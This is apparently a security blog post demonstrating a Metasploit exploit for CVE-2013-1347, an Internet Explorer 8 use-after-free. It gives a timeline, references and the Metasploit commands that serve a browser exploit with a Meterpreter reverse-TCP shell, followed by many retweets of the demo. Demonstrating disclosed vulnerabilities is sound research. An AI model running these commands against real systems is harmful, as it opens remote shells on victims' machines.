Timeline :
Watering hole campaign first reported on a private mailing list the 2013-04-30
Watering hole campaign publicly disclosed by AlienVault and Invincea the 2013-04-30
0day exploit spotted by FireEye the 2013-05-03
Microsoft Security Advisory posted the 2013-05-03
Metasploit PoC provided the 2013-05-05
PoC provided by :
Unknown
EMH
juan vazquez
sinn3r
Reference(s) :
CVE-2013-1347
OSVDB-92993
MSA-2847140
Affected version(s) :
Internet Explorer 8
Tested on Windows XP Pro SP3 with :
Internet Explorer 8
Description :
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that’s controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) web site.
Commands :
use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.178.36 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.36 exploit getuid sysinfo
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @Hfuhs: CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo – http://t.co/x9EEYAzfxM
[msf xploit demo] http://t.co/WJ8VQDnDk8
Microsoft Internet Explorer 8 Vulnerability Metasploit Demo
http://t.co/IWwBwghxZo
CVE-2013-1347 Internet Explorer 8 Vulnerability #Metasploit Demo [VIDEO] | Eric Romang http://t.co/IxCmr0lhux #IE #0day
CVE-2013-1347 Internet Explorer 8 Vulnerability #Metasploit Demo [VIDEO] | Eric Romang http://t.co/2h7K4i9SsQ #IE #0day
RT @hgascon: Waiting for the patch? Join the pwning party! “CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo” http://t.co/IR…
Waiting for the patch? Join the pwning party! “CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo” http://t.co/IR8Bz7IjsW
IE8 Vuln http://t.co/e4r6ypvddP and PoC http://t.co/jHtNcsO9ap
CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo: http://t.co/KXJZiGJudf #infosec
RT @unixfreaxjp: #Exploit #Demo – #CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability http://t.co/TFOqCR3st1 video: http://t.co/e65R…
CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/ugoPiKJi1x
@PvdHeuvel_ @OpenKortenhoef @0xDUDE @brenno hier een demo van exploit #IE8 ook http://t.co/9iIxKmZNtX
New IE 8 vulnerability http://t.co/WCuCaoikKt
RT @Hfuhs: CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo – http://t.co/x9EEYAzfxM
CVE-2013-1347 Internet Explorer 8 Vulnerability Metasploit Demo – http://t.co/x9EEYAzfxM
CVE-2013-1347 Vulnerabilidad Microsoft Internet Explorer 8 #Metasploit Demo http://t.co/hV8ZR2TFVm
RT @unixfreaxjp: #Exploit #Demo – #CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability http://t.co/TFOqCR3st1 video: http://t.co/e65R…
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @unixfreaxjp: #Exploit #Demo – #CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability http://t.co/TFOqCR3st1 video: http://t.co/e65R…
#CVE -2013-1347 #Microsoft Internet Explorer 8 Vulnerability #Metasploit Demo http://t.co/lQGYsctmtk #InfoSec
CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/eAN62AeKJ6
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
Para quienes aun estan con WinXP y IE CVE-2013-1347 Metasploit http://t.co/WY0FBLuQX3
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
RT @eromang: CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t
CVE-2013-1347 Microsoft Internet Explorer 8 Vulnerability Metasploit Demo http://t.co/TlxNHHOF9t